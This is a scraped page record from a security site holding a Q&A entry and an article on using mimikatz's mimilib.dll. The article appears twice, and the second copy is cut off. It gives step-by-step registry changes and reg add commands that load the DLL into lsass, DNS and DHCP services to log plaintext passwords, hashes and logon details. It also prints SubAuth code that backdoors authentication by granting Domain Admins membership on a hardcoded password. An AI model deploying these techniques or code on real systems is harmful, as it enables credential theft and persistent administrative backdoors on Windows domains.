[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7OmYkm1AZhbcGoOgRf4NhBnop6emyfEtCXYunqzsktQ":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},254,"How can mimilib.dll be used to capture password changes via the PasswordChangeNotify feature?","The PasswordChangeNotify feature uses `InitializeChangeNotify` and `PasswordChangeNotify` exports. Deploy mimilib.dll to `%SystemRoot%\\System32`, add `mimilib` to the `Notification Packages` registry value under `HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa`, and restart. Whenever a user changes their password, lsass.exe writes the new plaintext password to `kiwifilter.log`. This technique is also covered in [Domain Penetration - Hook PasswordChangeNotify](\u002Fnews\u002Fdomain-penetration-dns-records-and-machineaccount).","\u003Cp>The PasswordChangeNotify feature uses `InitializeChangeNotify` and `PasswordChangeNotify` exports. Deploy mimilib.dll to `%SystemRoot%\\System32`, add `mimilib` to the `Notification Packages` registry value under `HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa`, and restart. Whenever a user changes their password, lsass.exe writes the new plaintext password to `kiwifilter.log`. This technique is also covered in [Domain Penetration - Hook PasswordChangeNotify](\u002Fnews\u002Fdomain-penetration-dns-records-and-machineaccount).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fmimilib-usage-analysis\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-mimilibdll-be-used-to-capture-password-changes-via-the-passwordchangenot-1777484320906","mimilib, PasswordChangeNotify, password change, credential capture, kiwifilter, hook, domain penetration",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},66,"Mimilib Usage Analysis","mimilib-usage-analysis","Learn how to use Mimilib DLL's 6 key functions: SSP, PasswordChangeNotify, WinDbg extensions, and DnsPlugin for security testing and logging.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Mimilib is a subproject of mimikatz. After successful compilation, it generates the file mimilib.dll, which contains multiple exported functions.\u003C\u002Fp>\u003Cp>Currently, there is limited documentation on the usage of this DLL. Therefore, I will introduce the usage of each exported function in mimilib.dll based on my own test results.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Mimilib's Exported Functions\u003C\u002Fli>\u003Cli>Specific Usage of 6 Functions\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Mimilib's Exported Functions\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The corresponding file address is:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimilib\u002Fmimilib.def\u003C\u002Fp>\u003Cp>The content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>EXPORTS\u003Cbr>\tstartW\t\t\t\t\t=\tkappfree_startW\u003Cbr>\u003Cbr>\tSpLsaModeInitialize\t\t=\tkssp_SpLsaModeInitialize\u003Cbr>\t\u003Cbr>\tInitializeChangeNotify\t=\tkfilt_InitializeChangeNotify\u003Cbr>\tPasswordChangeNotify\t=\tkfilt_PasswordChangeNotify\u003Cbr>\u003Cbr>\tWinDbgExtensionDllInit\t=\tkdbg_WinDbgExtensionDllInit\u003Cbr>\tExtensionApiVersion\t\t=\tkdbg_ExtensionApiVersion\u003Cbr>\tcoffee\t\t\t\t\t=\tkdbg_coffee\u003Cbr>\tmimikatz\t\t\t\t=\tkdbg_mimikatz\u003Cbr>\u003Cbr>\tDnsPluginInitialize\t\t=\tkdns_DnsPluginInitialize\u003Cbr>\tDnsPluginCleanup\t\t=\tkdns_DnsPluginCleanup\u003Cbr>\tDnsPluginQuery\t\t\t=\tkdns_DnsPluginQuery\u003Cbr>\u003Cbr>\tDhcpServerCalloutEntry\t=\tkdhcp_DhcpServerCalloutEntry\u003Cbr>\tDhcpNewPktHook\t\t\t=\tkdhcp_DhcpNewPktHook\u003Cbr>\u003Cbr>\tMsv1_0SubAuthenticationRoutine\t= ksub_Msv1_0SubAuthenticationRoutine\u003Cbr>\tMsv1_0SubAuthenticationFilter\t= ksub_Msv1_0SubAuthenticationRoutine\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>I have categorized the above exported functions into 6 practical features\u003C\u002Fp>\u003Ch2>0x03 Specific Usage of the 6 Features\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.Security Support Provider\u003C\u002Fh3>\u003Cp>Corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>SpLsaModeInitialize\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\\u003C\u002Fp>\u003Cp>Add mimilib to the value of the registry entry Security Packages\u003C\u002Fp>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process lsass.exe will load mimilib.dll, and simultaneously generate the file kiwissp.log in %SystemRoot%\\System32, recording the plaintext passwords of the current user. The test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018745225_0_98aea48506.jpeg\">\u003C\u002Fp>\u003Cp>If you want to achieve the same functionality without restarting the system, you can refer to the previous analysis article:\u003C\u002Fp>\u003Cul>\u003Cli>Usage of SSP in Mimikatz\u003C\u002Fli>\u003Cli>Domain Penetration - Security Support Provider\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. PasswordChangeNotify\u003C\u002Fh3>\u003Cp>The corresponding export functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>InitializeChangeNotify\u003C\u002Fli>\u003Cli>PasswordChangeNotify\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\\u003C\u002Fp>\u003Cp>Add mimilib to the value of the registry entry Notification Packages\u003C\u002Fp>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process lsass.exe will load mimilib.dll. When a password change event occurs in the system, the file kiwifilter.log is generated in %SystemRoot%\\System32, recording the user's newly changed plaintext password. The test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018750668_1_3e03d2e771.jpeg\">\u003C\u002Fp>\u003Cp>If you want to achieve the same functionality without restarting the system, refer to the previous analysis article:\u003C\u002Fp>\u003Cul>\u003Cli>Domain Penetration - Hook PasswordChangeNotify\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>3.WinDbg Extension\u003C\u002Fh3>\u003Cp>The corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>WinDbgExtensionDllInit\u003C\u002Fli>\u003Cli>ExtensionApiVersion\u003C\u002Fli>\u003Cli>coffee\u003C\u002Fli>\u003Cli>mimikatz\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage:\u003C\u002Fp>\u003Cp>Save mimilib.dll to the winext directory of WinDbg\u003C\u002Fp>\u003Cp>The path saved in my test environment (Server2012R2x64) is: C:\\Program Files\\Debugging Tools for Windows (x64)\\winext\u003C\u002Fp>\u003Cp>Start WinDbg\u003C\u002Fp>\u003Cp>The command to load the plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test result is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018762425_2_c352b9fa12.jpeg\">\u003C\u002Fp>\u003Cp>Call named instance:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!coffee\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4.DnsPlugin\u003C\u002Fh3>\u003Cp>The corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>DnsPluginInitialize\u003C\u002Fli>\u003Cli>DnsPluginCleanup\u003C\u002Fli>\u003Cli>DnsPluginQuery\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage:\u003C\u002Fp>\u003Cp>Testing needs to be performed on the DNS server\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\\u003C\u002Fp>\u003Cp>Create a new registry entry ServerLevelPluginDll, type REG_SZ, value mimilib.dll\u003C\u002Fp>\u003Cp>The corresponding cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters \u002Fv ServerLevelPluginDll \u002Ft REG_SZ \u002Fd \"mimilib.dll\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process dns.exe will load mimilib.dll, and when a DNS query event occurs in the system, a file kiwidns.log will be generated in %SystemRoot%\\System32, recording the following information:\u003C\u002Fp>\u003Cul>\u003Cli>QueryName\u003C\u002Fli>\u003Cli>QueryType\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018780155_3_dba6dc479a.jpeg\">\u003C\u002Fp>\u003Cp>If you want to achieve the same functionality remotely, you can refer to the previous analysis article:\u003C\u002Fp>\u003Cul>\u003Cli>Domain Penetration—Using dnscmd to Achieve Remote DLL Loading on DNS Servers\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>5.DHCP callout DLL\u003C\u002Fh3>\u003Cp>The corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>DhcpServerCalloutEntry\u003C\u002Fli>\u003Cli>DhcpNewPktHook\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Testing needs to be performed on the DHCP server\u003C\u002Fp>\u003Cp>Modify the source code to set the MAC addresses that need to be disabled. The corresponding code location is: https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimilib\u002Fkdhcp.c#L35\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters\u003C\u002Fp>\u003Cp>Create a new registry entry CalloutDlls of type REG_MULTI_SZ with the value mimilib.dll\u003C\u002Fp>\u003Cp>Create a new registry entry CalloutEnabled of type DWORD with the value 1\u003C\u002Fp>\u003Cp>The corresponding cmd commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters \u002Fv CalloutDlls \u002Ft REG_MULTI_SZ \u002Fd \"mimilib.dll\" \u002Ff\u003Cbr>reg add HKLM\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters \u002Fv CalloutEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process svchost.exe will load mimilib.dll and discard DHCP requests corresponding to the MAC address\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fdesktop\u002Fdhcp\u002Fhow-the-dhcp-server-api-operates\u003C\u002Fp>\u003Ch3>6.SubAuth\u003C\u002Fh3>\u003Cp>The corresponding export functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Msv1_0SubAuthenticationRoutine\u003C\u002Fli>\u003Cli>Msv1_0SubAuthenticationFilter\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\u003C\u002Fp>\u003Cp>Create a new registry entry Auth0 of type REG_SZ with value mimilib\u003C\u002Fp>\u003Cp>The corresponding cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0 \u002Fv Auth0 \u002Ft REG_SZ \u002Fd \"mimilib\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If in a domain environment, configuration is required on the domain controller\u003C\u002Fp>\u003Cp>Modify registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos\u003C\u002Fp>\u003Cp>Create a new registry entry Auth0 of type REG_SZ with value mimilib\u003C\u002Fp>\u003Cp>The corresponding cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos \u002Fv Auth0 \u002Ft REG_SZ \u002Fd \"mimilib\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The lsass.exe process will load mimilib.dll, generating a file kiwisub.log in %SystemRoot%\\System32 when system login events occur, recording the following information:\u003C\u002Fp>\u003Cul>\u003Cli>UserId\u003C\u002Fli>\u003Cli>PrimaryGroupId\u003C\u002Fli>\u003Cli>LogonDomainName\u003C\u002Fli>\u003Cli>UserName\u003C\u002Fli>\u003Cli>Workstation\u003C\u002Fli>\u003Cli>BadPasswordCount\u003C\u002Fli>\u003Cli>hash\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Note that when the system boots up, it records the login content of the computer account\u003C\u002Fp>\u003Cp>Here, you can try adding code to display the time, which will allow you to obtain the boot time and user login time for each host\u003C\u002Fp>\u003Cp>Corresponding code address: https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimilib\u002Fksub.c\u003C\u002Fp>\u003Cp>The modified content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F*\tBenjamin DELPY `gentilkiwi`\u003Cbr>\thttp:\u002F\u002Fblog.gentilkiwi.com\u003Cbr>\tbenjamin@gentilkiwi.com\u003Cbr>\u003Cbr>\tVincent LE TOUX\u003Cbr>\thttp:\u002F\u002Fpingcastle.com \u002F http:\u002F\u002Fmysmartlogon.com\u003Cbr>\tvincent.letoux@gmail.com\u003Cbr>\u003Cbr>\tLicence : https:\u002F\u002Fcreativecommons.org\u002Flicenses\u002Fby\u002F4.0\u002F\u003Cbr>*\u002F\u003Cbr>#include \"ksub.h\"\u003Cbr>\u003Cbr>\u003Cbr>const BYTE myHash[LM_NTLM_HASH_LENGTH] = {0xea, 0x37, 0x0c, 0xb7, 0xb9, 0x44, 0x70, 0x2c, 0x09, 0x68, 0x30, 0xdf, 0xc3, 0x53, 0xe7, 0x02}; \u002F\u002F Waza1234\u002Fadmin\u003Cbr>NTSTATUS NTAPI ksub_Msv1_0SubAuthenticationRoutine(IN NETLOGON_LOGON_INFO_CLASS LogonLevel, IN PVOID LogonInformation, IN ULONG Flags, IN PUSER_ALL_INFORMATION UserAll, OUT PULONG WhichFields, OUT PULONG UserFlags, OUT PBOOLEAN Authoritative, OUT PLARGE_INTEGER LogoffTime, OUT PLARGE_INTEGER KickoffTime)\u003Cbr>{\u003Cbr>\tFILE *ksub_logfile;;\u003Cbr>#pragma warning(push)\u003Cbr>#pragma warning(disable:4996)\u003Cbr>\tif(ksub_logfile = _wfopen(L\"kiwisub.log\", L\"a\"))\u003Cbr>#pragma warning(pop)\u003Cbr>\t{\u003Cbr>\t\tSYSTEMTIME st;\u003Cbr>\t\tGetLocalTime(&amp;st);\u003Cbr>\u003Cbr>\t\tklog(ksub_logfile, L\"%04d-%02d-%02d %02d:%02d:%02d %u (%u) - %wZ\\\\%wZ (%wZ) (%hu) \", st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond, UserAll-&gt;UserId, UserAll-&gt;PrimaryGroupId, &amp;((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)-&gt;LogonDomainName, &amp;((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)-&gt;UserName, &amp;((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)-&gt;Workstation, UserAll-&gt;BadPasswordCount);\u003Cbr>\t\tif(UserAll-&gt;NtPasswordPresent)\u003Cbr>\t\t\tklog_hash(ksub_logfile, &amp;UserAll-&gt;NtPassword, FALSE);\u003Cbr>\t\tif((UserAll-&gt;BadPasswordCount == 4) || (UserAll-&gt;NtPasswordPresent &amp;&amp; RtlEqualMemory(UserAll-&gt;NtPassword.Buffer, myHash, min(sizeof(myHash), UserAll-&gt;NtPassword.Length))))\u003Cbr>\t\t{\u003Cbr>\t\t\tUserAll-&gt;PrimaryGroupId = 512;\u003Cbr>\t\t\tklog(ksub_logfile, L\" :)\\n\");\u003Cbr>\t\t}\u003Cbr>\t\telse klog(ksub_logfile, L\"\\n\");\u003Cbr>\t\tfclose(ksub_logfile);\u003Cbr>\t}\u003Cbr>\t*WhichFields = 0;\u003Cbr>\t*UserFlags = 0;\u003Cbr>\t*Authoritative = TRUE;\u003Cbr>\tLogoffTime-&gt;QuadPart = KickoffTime-&gt;QuadPart = 0x7fffffffffffffff;\u003Cbr>\treturn STATUS_SUCCESS;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018787921_4_2a45fee1f0.jpeg\">\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmicrosoft\u002FWindows-classic-samples\u002Ftree\u002Fmaster\u002FSamples\u002FWin7Samples\u002Fsecurity\u002Fauthentication\u002Fmsvsubauth\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fsecauthn\u002Fmsv1-0-authentication-package\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the specific usage of six functions in Mimilib.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Mimilib is a subproject of mimikatz. After successful compilation, it generates the file mimilib.dll, which contains multiple exported functions.\u003C\u002Fp>\u003Cp>Currently, there is limited documentation on the usage of this DLL. Therefore, I will introduce the usage of each exported function in mimilib.dll based on my own test results.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Mimilib's Exported Functions\u003C\u002Fli>\u003Cli>Specific Usage of 6 Functions\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Mimilib's Exported Functions\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The corresponding file address is:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimilib\u002Fmimilib.def\u003C\u002Fp>\u003Cp>The content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>EXPORTS\u003Cbr>\tstartW\t\t\t\t\t=\tkappfree_startW\u003Cbr>\u003Cbr>\tSpLsaModeInitialize\t\t=\tkssp_SpLsaModeInitialize\u003Cbr>\t\u003Cbr>\tInitializeChangeNotify\t=\tkfilt_InitializeChangeNotify\u003Cbr>\tPasswordChangeNotify\t=\tkfilt_PasswordChangeNotify\u003Cbr>\u003Cbr>\tWinDbgExtensionDllInit\t=\tkdbg_WinDbgExtensionDllInit\u003Cbr>\tExtensionApiVersion\t\t=\tkdbg_ExtensionApiVersion\u003Cbr>\tcoffee\t\t\t\t\t=\tkdbg_coffee\u003Cbr>\tmimikatz\t\t\t\t=\tkdbg_mimikatz\u003Cbr>\u003Cbr>\tDnsPluginInitialize\t\t=\tkdns_DnsPluginInitialize\u003Cbr>\tDnsPluginCleanup\t\t=\tkdns_DnsPluginCleanup\u003Cbr>\tDnsPluginQuery\t\t\t=\tkdns_DnsPluginQuery\u003Cbr>\u003Cbr>\tDhcpServerCalloutEntry\t=\tkdhcp_DhcpServerCalloutEntry\u003Cbr>\tDhcpNewPktHook\t\t\t=\tkdhcp_DhcpNewPktHook\u003Cbr>\u003Cbr>\tMsv1_0SubAuthenticationRoutine\t= ksub_Msv1_0SubAuthenticationRoutine\u003Cbr>\tMsv1_0SubAuthenticationFilter\t= ksub_Msv1_0SubAuthenticationRoutine\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>I have categorized the above exported functions into 6 practical features\u003C\u002Fp>\u003Ch2>0x03 Specific Usage of the 6 Features\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1.Security Support Provider\u003C\u002Fh3>\u003Cp>Corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>SpLsaModeInitialize\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\\u003C\u002Fp>\u003Cp>Add mimilib to the value of the registry entry Security Packages\u003C\u002Fp>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process lsass.exe will load mimilib.dll, and simultaneously generate the file kiwissp.log in %SystemRoot%\\System32, recording the plaintext passwords of the current user. The test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018745225_0_98aea48506-1.jpeg\">\u003C\u002Fp>\u003Cp>If you want to achieve the same functionality without restarting the system, you can refer to the previous analysis article:\u003C\u002Fp>\u003Cul>\u003Cli>Usage of SSP in Mimikatz\u003C\u002Fli>\u003Cli>Domain Penetration - Security Support Provider\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. PasswordChangeNotify\u003C\u002Fh3>\u003Cp>The corresponding export functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>InitializeChangeNotify\u003C\u002Fli>\u003Cli>PasswordChangeNotify\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\\u003C\u002Fp>\u003Cp>Add mimilib to the value of the registry entry Notification Packages\u003C\u002Fp>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process lsass.exe will load mimilib.dll. When a password change event occurs in the system, the file kiwifilter.log is generated in %SystemRoot%\\System32, recording the user's newly changed plaintext password. The test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018750668_1_3e03d2e771-1.jpeg\">\u003C\u002Fp>\u003Cp>If you want to achieve the same functionality without restarting the system, refer to the previous analysis article:\u003C\u002Fp>\u003Cul>\u003Cli>Domain Penetration - Hook PasswordChangeNotify\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>3.WinDbg Extension\u003C\u002Fh3>\u003Cp>The corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>WinDbgExtensionDllInit\u003C\u002Fli>\u003Cli>ExtensionApiVersion\u003C\u002Fli>\u003Cli>coffee\u003C\u002Fli>\u003Cli>mimikatz\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage:\u003C\u002Fp>\u003Cp>Save mimilib.dll to the winext directory of WinDbg\u003C\u002Fp>\u003Cp>The path saved in my test environment (Server2012R2x64) is: C:\\Program Files\\Debugging Tools for Windows (x64)\\winext\u003C\u002Fp>\u003Cp>Start WinDbg\u003C\u002Fp>\u003Cp>The command to load the plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.load mimilib\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test result is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018762425_2_c352b9fa12-1.jpeg\">\u003C\u002Fp>\u003Cp>Call named instance:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>!coffee\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4.DnsPlugin\u003C\u002Fh3>\u003Cp>The corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>DnsPluginInitialize\u003C\u002Fli>\u003Cli>DnsPluginCleanup\u003C\u002Fli>\u003Cli>DnsPluginQuery\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage:\u003C\u002Fp>\u003Cp>Testing needs to be performed on the DNS server\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\\u003C\u002Fp>\u003Cp>Create a new registry entry ServerLevelPluginDll, type REG_SZ, value mimilib.dll\u003C\u002Fp>\u003Cp>The corresponding cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters \u002Fv ServerLevelPluginDll \u002Ft REG_SZ \u002Fd \"mimilib.dll\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process dns.exe will load mimilib.dll, and when a DNS query event occurs in the system, a file kiwidns.log will be generated in %SystemRoot%\\System32, recording the following information:\u003C\u002Fp>\u003Cul>\u003Cli>QueryName\u003C\u002Fli>\u003Cli>QueryType\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018780155_3_dba6dc479a-1.jpeg\">\u003C\u002Fp>\u003Cp>If you want to achieve the same functionality remotely, you can refer to the previous analysis article:\u003C\u002Fp>\u003Cul>\u003Cli>Domain Penetration—Using dnscmd to Achieve Remote DLL Loading on DNS Servers\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>5.DHCP callout DLL\u003C\u002Fh3>\u003Cp>The corresponding exported functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>DhcpServerCalloutEntry\u003C\u002Fli>\u003Cli>DhcpNewPktHook\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Testing needs to be performed on the DHCP server\u003C\u002Fp>\u003Cp>Modify the source 